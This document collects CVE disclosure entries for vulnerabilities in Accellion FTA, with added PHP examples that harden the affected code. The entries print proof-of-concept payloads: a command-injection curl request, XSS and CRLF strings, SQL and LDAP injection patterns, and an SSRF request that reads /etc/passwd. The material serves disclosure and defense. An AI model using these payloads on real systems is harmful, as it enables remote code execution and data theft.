Accellion FTA CVEs
RCE: CVE-2017-8303
> curl -i '/find.api' --data "method=x%27%60id>/tmp/zz%60%27&oauth_token=b"
> -H 'Content-type: application/x-www-form-urlencoded'
>
> This Payload executes "id >/tmp/zz".
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Code Execution
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> all versions before Accellion FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> by sending a specifically crafted CURL request to the user
> https://whitehat-fta.accellion.net/seos/1000/find.api a remote
> attacker will be able to execute code
>
> ------------------------------------------
DOM XSS: CVE-2017-8304
> POC: https://fta/courier/1000@/oauth/playground/callback.html#<img src=x onerror=alert('xss')>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Accellion before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> The issue is caused by a javascript code doing
> $('redirect_uri').innerHTML = location.href;
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
RXSS: CVE-2017-8760
> Accellion FTA tries to use internal WAF filters to stop specific XSS
> Vulnerabilities. However, these can be bypassed by using some
> modifications to the payloads
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> FTA before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> https://FTA/hitehat-fta.accellion.net/courier/1000@/index.html?auth=oauth&auth_params=asdf%22%3E%20%3Cimg%20src%3Dx%20onerror%3Dalert(%27alert%60xss%60%27)%2F%2F%3E
>
> ------------------------------------------
>
> [Reference]
> https://accellion.com/
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
CRLF CVE-2017-8788
> [VulnerabilityType Other]
> CRLF
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> before FTA_9_12_180
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> there is a CRLF vulnerability in settings_global_text_edit.php because of
> 228: $html_id = ($_GET['html_id'] : $_POST['html_id']);
> 33: $display = ($_GET['display'] : $_POST['display']);
> header('Location: settings_global_text_edit.html?simple=1&display=' . $display .
> '&saved=1&html_id=' . $html_id . '&text=' . urlencode($_POST['service_name'] : $_POST['wc_disclaimer']));
>
> which attacker can exploit by sending ?display=x%0Dnewline in Google Chrome and IE
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
SQL Injection CVE-2017-8789
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> report_error.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 65: $year1 = $_GET['year1'];
> 165: $sql = 'SELECT COUNT(*) FROM t_error_log ' . "\n" . ' WHERE c_timestamp >= \'' . $year1 . '-' . $month1 ....
>
> attacker can send report_error.php?year='payload
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
LDAP Injection CVE-2017-8790
> [VulnerabilityType Other]
> LDAP Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Accellion before FTA_9_12_180 home/seos/courier/ldaptest.html POST parameter "filter" can be used to
> perform LDAP Injection attacks
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 80: $_POST['filter'] ='objectclass=*'; //unsanitized
> 118:$result = ldap_search($conn, $_POST['basedn'], $_POST['filter'])))
>
> by sending a POST request to ...
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
> [VulnerabilityType Other]
> CRLF
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Http response splitting In home/seos/courier/login.html
>
> 29: $login_param.= '&auth=oauth&admin=1&auth_params=' .($_GET['auth_params'] :
> $_POST['auth_params']); //unsanitized params of GET and POST
> 01: $ldap_err = '&ldap_err_msg=1'; 121: header('Loc ...
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> By using home/seos/courier/login.html?auth_params=x%0Dnew:header or POST of 'auth_params'
> attacker will be able to split headers and cause a CRLF attack
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8791.
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Cross Site Scripting In home/seos/courier/user_add.html
>
> 476: $back = ($_POST['param'] : 'user_list.html'); 503: echo '';
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> by sending a POST request to the param parameter to user_add.html with
> a payload like <script>alert()</script> attacker can cause XSS attacks
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8792.
> [Suggested description]
> by sending a POST request to that URL with
> attacker domain to the acallow parameter, server will respond with
> Access-Control-Allow-Origin header allowing attacker site access.
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> SOP Bypass
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> In home/seos/courier/web/wmProgressstat.html.php
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> 36: if(((isset($_POST['acallow']) &&isset($_POST['cka'])) &&$_POST['cka'] == 1))//required
> 37: $acallow = $_POST['acallow'];//unsanitized
> 38: header('Access-Control-Allow-Origin: https://'. $acallow);
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8793.
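
The two header problems reported above (request values concatenated into a `Location:` redirect in settings_global_text_edit.php and login.html, and the `acallow` parameter copied into `Access-Control-Allow-Origin`) share one fix: the server decides what goes into a response header. This is an added example, not Accellion code; the origin allowlist and sample values are constructed.

```php
<?php
// Added example, not Accellion code. The file name mirrors the report; the
// origin allowlist and the sample values are constructed for illustration.

// Redirect target: refuse control characters outright, then build the query
// with http_build_query(), which percent-encodes every reserved byte.
function redirect_location(string $display, string $htmlId, string $text): ?string
{
    foreach ([$display, $htmlId, $text] as $value) {
        if (preg_match('/[\x00-\x1F\x7F]/', $value)) {
            return null;               // caller answers 400 instead of redirecting
        }
    }
    return 'settings_global_text_edit.html?' . http_build_query([
        'simple'  => 1,
        'display' => $display,
        'saved'   => 1,
        'html_id' => $htmlId,
        'text'    => $text,
    ]);
}

// CORS: the allowed origin comes from a fixed server-side list and is matched
// exactly against the browser's Origin header, never read from a parameter.
const ALLOWED_ORIGINS = ['https://fta.example.com'];   // constructed allowlist

function cors_headers(?string $origin): array
{
    if ($origin === null || !in_array($origin, ALLOWED_ORIGINS, true)) {
        return [];                     // emit no Access-Control-Allow-Origin at all
    }
    return ['Access-Control-Allow-Origin: ' . $origin, 'Vary: Origin'];
}

// Constructed inputs; "x\rnewline" is the report's x%0Dnewline after URL decoding.
var_dump(redirect_location('list', '3', 'hello world'));
var_dump(redirect_location("x\rnewline", '3', 'hello'));
var_dump(cors_headers('https://fta.example.com'));
var_dump(cors_headers('https://attacker.example'));
```
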
> [VulnerabilityType Other]
> Server Side Request Forgery
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> /courier/web/1000@/wmProgressval.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> because regexp is missing a ^ char in the start, so it's enough to have https: somewhere later in the url,
> so file:///etc/passwd#https:/... works
>
> Payload: curl -i 'https://whitehat-fta.accellion.net/courier/web/1000@/wmProgressval.html'
> --data 'server=file:///etc/passwd#https://xwhitehat-fta.accellion.net'
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8794.
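
The unanchored check described above, next to an anchored one and a parse-then-allowlist check, as an added example that is not Accellion code. The regular expression and the host allowlist are assumptions, since the report does not quote the original pattern.

```php
<?php
// Added example, not Accellion code. The pattern and host allowlist are assumptions.

// Unanchored check of the kind the report describes: "https:" anywhere passes.
function weak_is_allowed(string $server): bool
{
    return preg_match('#https://#i', $server) === 1;
}

// Anchoring with ^ closes this particular gap but still trusts string matching.
function anchored_is_allowed(string $server): bool
{
    return preg_match('#^https://#i', $server) === 1;
}

// Stricter: parse the URL, then compare scheme and host exactly to an allowlist.
function strict_is_allowed(string $server, array $allowedHosts): bool
{
    $parts = parse_url($server);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (strtolower($parts['scheme']) !== 'https') {
        return false;
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;   // userinfo can hide the real host from a reader of the URL
    }
    return in_array(strtolower($parts['host']), $allowedHosts, true);
}

$allowedHosts = ['fta.example.com'];                           // constructed
$samples = [
    'https://fta.example.com/status',                          // constructed, legitimate
    'https://other.example.net/status',                        // constructed, not allowlisted
    'file:///etc/passwd#https://xwhitehat-fta.accellion.net',  // value quoted in the report
];
foreach ($samples as $s) {
    printf("weak=%d anchored=%d strict=%d  %s\n",
        weak_is_allowed($s), anchored_is_allowed($s),
        strict_is_allowed($s, $allowedHosts), $s);
}
```

Where the fetch itself is done with PHP's cURL extension, setting `CURLOPT_PROTOCOLS` to `CURLPROTO_HTTPS` adds a second layer that refuses `file:` regardless of the validation result.
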
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> Cross Site Scripting In home/seos/courier/smtpg_add.html
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> Cross Site Scripting In home/seos/courier/smtpg_add.html.php
> 162: $back = ($_POST['param'] : 'smtpg_list.html'); //unsanitized POST*'param'+ 177: echo '';
> 177: echo "<input class=\'button\'type=\'button\'value=\'Back\'onClick=\'window.location=".htmlentities($back)."'">
>
> By sending payloads like javascript:alert(0) to the POST `param` attacker will be able to execute attacks.
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8795.
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Accellion
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Accellion FTA - before FTA_9_12_180
>
> ------------------------------------------
>
> [Affected Component]
> In /seos/courier/communication_p2p.php
>
> 19: $app_id = $_POST['app_id']; Then line
> 21: $sql = 'SELECT apps.loc_id,active,relay_ip FROM apps,servers WHERE
> apps.loc_id=servers.loc_id AND apps.app_id=' . mysql_real_escape_string( $app_id );
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> This bug is a perfect example of an incorrect usage of the function
> mysql_real_escape_string. Since the function is supposed to help with
> escaping quotes but there are zero quotes in there. So attacker can
> still execute SQL statements without sending any quotes, simply by
> adding his statement like
> X AND UNION DO THIS-
>
> This will execute:
>
> 'SELECT apps.loc_id,active,relay_ip FROM apps,servers WHERE
> apps.loc_id=servers.loc_id AND apps.app_id= X AND UNION DO THIS-
> As you can clearly see, you need to put things in quote before calling
> the function or the function itself will have nothing to escape
> quotes from.
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Paulos Yibelo
Use CVE-2017-8796.
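
The unquoted numeric context described above, shown beside a version that validates the value as an integer and binds it, as an added example that is not Accellion code. It assumes the `pdo_sqlite` extension; the table, rows and inputs are constructed, and an in-memory SQLite database stands in for MySQL.

```php
<?php
// Added example, not Accellion code. Table, rows and inputs are constructed;
// an in-memory SQLite database via PDO stands in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE apps (app_id INTEGER, loc_id INTEGER, active INTEGER)');
$db->exec('INSERT INTO apps VALUES (1, 10, 1), (2, 20, 0)');

// Simplified stand-in for mysql_real_escape_string(): it escapes quote
// characters and leaves everything else untouched.
function escape_quotes(string $value): string
{
    return str_replace("'", "''", $value);
}

// Pattern from the report: the escaped value is concatenated where a number is
// expected, with no surrounding quotes, so the escaping has nothing to act on.
function lookup_concat(PDO $db, string $appId): array
{
    $sql = 'SELECT loc_id, active FROM apps WHERE app_id=' . escape_quotes($appId);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: require an integer, then bind it as a typed parameter.
function lookup_bound(PDO $db, string $appId): array
{
    $id = filter_var($appId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];
    }
    $stmt = $db->prepare('SELECT loc_id, active FROM apps WHERE app_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

foreach (['1', '1 OR 1=1'] as $input) {      // second value is quote-free on purpose
    printf("%-10s concat=%d rows, bound=%d rows\n", $input,
        count(lookup_concat($db, $input)), count(lookup_bound($db, $input)));
}
```
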